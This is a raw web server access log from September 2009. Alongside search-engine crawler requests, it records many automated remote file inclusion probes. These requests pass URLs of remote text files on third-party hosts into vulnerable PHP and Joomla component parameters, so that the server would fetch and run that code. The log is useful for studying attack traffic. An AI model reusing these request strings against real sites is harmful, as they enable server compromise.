65.55.230.164 - - [11/Sep/2009:08:30:49 -0500] "GET /logs/access_log.1156723200 HTTP/1.1" 200 843 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:08:30:49 -0500] "GET /logs/access_log.1227484800 HTTP/1.1" 200 22925 "-""Mozilla/4.0"
58.120.226.113 - - [11/Sep/2009:08:32:08 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:08:32:17 -0500] "GET /logs/access_log.1242518400///?_SERVER[DOCUMENT_ROOT]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:08:32:17 -0500] "GET /logs/access_log.1247097600///?_SERVER[DOCUMENT_ROOT]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:08:32:18 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 200 204584 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:08:32:56 -0500] "GET /logs/access_log.1227657600 HTTP/1.1" 200 13131 "-""Mozilla/4.0"
124.158.127.241 - - [11/Sep/2009:08:34:45 -0500] "GET /?commonpath=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
124.158.127.241 - - [11/Sep/2009:08:34:45 -0500] "GET /logs/?commonpath=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.79"
59.24.49.35 - - [11/Sep/2009:08:36:46 -0500] "GET //visualrecommend.html.php?mosConfig_absolute_path=components/com_utchat/utchat.php?mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:08:36:46 -0500] "GET /logs/access_log.1242777600//visualrecommend.html.php?mosConfig_absolute_path=components/com_utchat/utchat.php?mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:08:36:46 -0500] "GET /logs//visualrecommend.html.php?mosConfig_absolute_path=components/com_utchat/utchat.php?mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:08:38:23 -0500] "GET /logs/access_log.1242777600//visualrecommend.html.php?mosConfig_absolute_path=components/com_utchat/utchat.php?mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:08:38:23 -0500] "GET //visualrecommend.html.php?mosConfig_absolute_path=components/com_utchat/utchat.php?mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:08:38:23 -0500] "GET /logs//visualrecommend.html.php?mosConfig_absolute_path=components/com_utchat/utchat.php?mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.249.68.48 - - [11/Sep/2009:08:38:26 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 200 255580 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
219.85.63.226 - - [11/Sep/2009:08:39:58 -0500] "GET /logs/access_log.1244851200//SSI.php?sourcedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:08:39:58 -0500] "GET //SSI.php?sourcedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:08:39:58 -0500] "GET /logs//SSI.php?sourcedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:08:41:13 -0500] "GET //?_zb_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:08:41:13 -0500] "GET /logs/access_log.1248566400//?_zb_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:08:41:15 -0500] "GET /logs//?_zb_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 200 204583 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:08:42:01 -0500] "GET /logs/access_log.1244073600//SSI.php?sourcedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.176.226.186 - - [11/Sep/2009:08:42:03 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.176.226.186 - - [11/Sep/2009:08:42:03 -0500] "GET //guestbook1//admin.php?include_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
81.176.226.186 - - [11/Sep/2009:08:42:03 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:08:43:35 -0500] "GET /logs/access_log.1128297600 HTTP/1.1" 200 1210 "-""Mozilla/4.0"
219.85.63.226 - - [11/Sep/2009:08:47:40 -0500] "GET /logs/access_log.1243123200//SSI.php?sourcedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:08:47:40 -0500] "GET /logs/access_log.1245542400//SSI.php?sourcedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:08:48:16 -0500] "GET /?commonpath=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:08:48:16 -0500] "GET /logs/access_log.1241654400/?commonpath=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:08:48:17 -0500] "GET /logs/?commonpath=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
72.11.145.8 - - [11/Sep/2009:08:51:09 -0500] "GET /logs////setup.php?dir=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.11.145.8 - - [11/Sep/2009:08:51:10 -0500] "GET ////setup.php?dir=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
209.172.33.230 - - [11/Sep/2009:08:55:07 -0500] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
209.172.33.230 - - [11/Sep/2009:08:55:07 -0500] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
65.55.230.164 - - [11/Sep/2009:08:55:29 -0500] "GET /logs/access_log.1188432000 HTTP/1.1" 200 582 "-""Mozilla/4.0"
174.37.136.126 - - [11/Sep/2009:08:55:57 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:08:55:57 -0500] "GET //?path%5Bdocroot%5D=http://tiete.com.br/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:08:55:58 -0500] "GET /logs//?path%5Bdocroot%5D=http://tiete.com.br/copyright.txt???? HTTP/1.1" 200 204583 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:08:56:03 -0500] "GET /logs/access_log.1239840000//?path%5Bdocroot%5D=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:08:56:31 -0500] "GET //?path%5Bdocroot%5D=http://tiete.com.br/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:08:56:31 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:08:56:32 -0500] "GET /logs//?path%5Bdocroot%5D=http://tiete.com.br/copyright.txt???? HTTP/1.1" 200 204583 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:08:56:40 -0500] "GET /logs/access_log.1239840000//?path%5Bdocroot%5D=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
118.107.162.36 - - [11/Sep/2009:08:57:44 -0500] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
118.107.162.36 - - [11/Sep/2009:08:57:44 -0500] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
66.148.68.101 - - [11/Sep/2009:08:58:30 -0500] "GET /?commonpath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.148.68.101 - - [11/Sep/2009:08:58:31 -0500] "GET /logs/?commonpath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:39 -0500] "GET /logs/access_log.1243468800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:39 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:39 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:39 -0500] "GET /logs/access_log.1247356800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.148.68.101 - - [11/Sep/2009:08:58:40 -0500] "GET /logs/access_log.1243728000/?commonpath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.68.101 - - [11/Sep/2009:08:58:40 -0500] "GET /logs/access_log.1246406400/?commonpath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:42 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:42 -0500] "GET /logs/access_log.1243468800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:42 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:42 -0500] "GET /logs/access_log.1247356800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:44 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:45 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:45 -0500] "GET /logs/access_log.1247356800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:58:45 -0500] "GET /logs/access_log.1243468800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:59:01 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:59:01 -0500] "GET /logs/access_log.1243468800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:59:01 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:59:01 -0500] "GET /logs/access_log.1247356800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:08:59:54 -0500] "GET /logs/access_log.1237075200//phplive/setup/header.php?css_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:08:59:54 -0500] "GET /logs//phplive/setup/header.php?css_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:08:59:54 -0500] "GET //phplive/setup/header.php?css_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
65.55.208.133 - - [11/Sep/2009:09:00:54 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [11/Sep/2009:09:00:55 -0500] "GET /logs/access_log.1249603200 HTTP/1.1" 200 486821 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.151.132.176 - - [11/Sep/2009:09:01:23 -0500] "GET /logs/access_log.1238284800//phplive/setup/header.php?css_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:09:01:42 -0500] "GET /become_editor.php?theme_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:09:01:42 -0500] "GET /logs/access_log.1245715200/become_editor.php?theme_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:09:01:42 -0500] "GET /logs/become_editor.php?theme_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:09:01:43 -0500] "GET /become_editor.php?theme_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:09:01:43 -0500] "GET /logs/access_log.1245715200/become_editor.php?theme_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:09:01:43 -0500] "GET /logs/become_editor.php?theme_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:09:01:47 -0500] "GET /logs/access_log.1251763200/become_editor.php?theme_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:09:01:47 -0500] "GET /logs/access_log.1238112000/become_editor.php?theme_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:09:02:00 -0500] "GET /logs/access_log.1238112000/become_editor.php?theme_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:09:02:00 -0500] "GET /logs/access_log.1230508800//phplive/setup/header.php?css_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.207 - - [11/Sep/2009:09:02:07 -0500] "GET /logs/access_log.1208736000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.44.226 - - [11/Sep/2009:09:02:30 -0500] "GET /logs/access_log.1236470400/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
69.175.44.226 - - [11/Sep/2009:09:02:30 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.44.226 - - [11/Sep/2009:09:02:30 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:04:05 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:04:05 -0500] "GET /logs/access_log.1244764800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:04:06 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:04:06 -0500] "GET /logs/access_log.1244764800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:04:06 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.55.207.119 - - [11/Sep/2009:09:04:07 -0500] "GET /logs/access_log.1168387200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.228.191.194 - - [11/Sep/2009:09:04:08 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:09:04:46 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:09:04:46 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:09:04:46 -0500] "GET /logs/access_log.1244764800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:06:53 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:06:53 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:06:53 -0500] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:06:59 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:06:59 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:06:59 -0500] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:07:16 -0500] "GET /logs/access_log.1244764800//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:07:22 -0500] "GET /logs/access_log.1244764800//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:08:24 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:08:24 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:08:24 -0500] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:08:28 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:08:29 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:08:29 -0500] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.208.123 - - [11/Sep/2009:09:09:17 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [11/Sep/2009:09:09:19 -0500] "GET /logs/access_log.1250294400 HTTP/1.1" 200 731064 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.34.235.215 - - [11/Sep/2009:09:10:30 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
72.34.235.215 - - [11/Sep/2009:09:10:30 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.34.235.215 - - [11/Sep/2009:09:10:30 -0500] "GET /logs/access_log.1243814400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.115.89.97 - - [11/Sep/2009:09:10:35 -0500] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.115.89.97 - - [11/Sep/2009:09:10:35 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.115.89.97 - - [11/Sep/2009:09:10:35 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.115.89.97 - - [11/Sep/2009:09:11:05 -0500] "GET /logs/access_log.1244764800//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
114.4.8.14 - - [11/Sep/2009:09:11:34 -0500] "GET ///?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
114.4.8.14 - - [11/Sep/2009:09:11:37 -0500] "GET /logs/access_log.1239667200///?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.4.8.14 - - [11/Sep/2009:09:11:55 -0500] "GET /logs///?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 200 204584 "-""Mozilla/5.0"
211.115.89.97 - - [11/Sep/2009:09:12:35 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.115.89.97 - - [11/Sep/2009:09:12:36 -0500] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.115.89.97 - - [11/Sep/2009:09:12:36 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.115.89.97 - - [11/Sep/2009:09:12:57 -0500] "GET /logs/access_log.1244764800//admin/classes/TplLoad.php?full_path_to_public_program=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.114 - - [11/Sep/2009:09:17:07 -0500] "GET /logs/access_log.1161820800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.206 - - [11/Sep/2009:09:20:36 -0500] "GET /logs/access_log.1247961600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.233.69.41 - - [11/Sep/2009:09:21:40 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
211.233.69.41 - - [11/Sep/2009:09:21:40 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
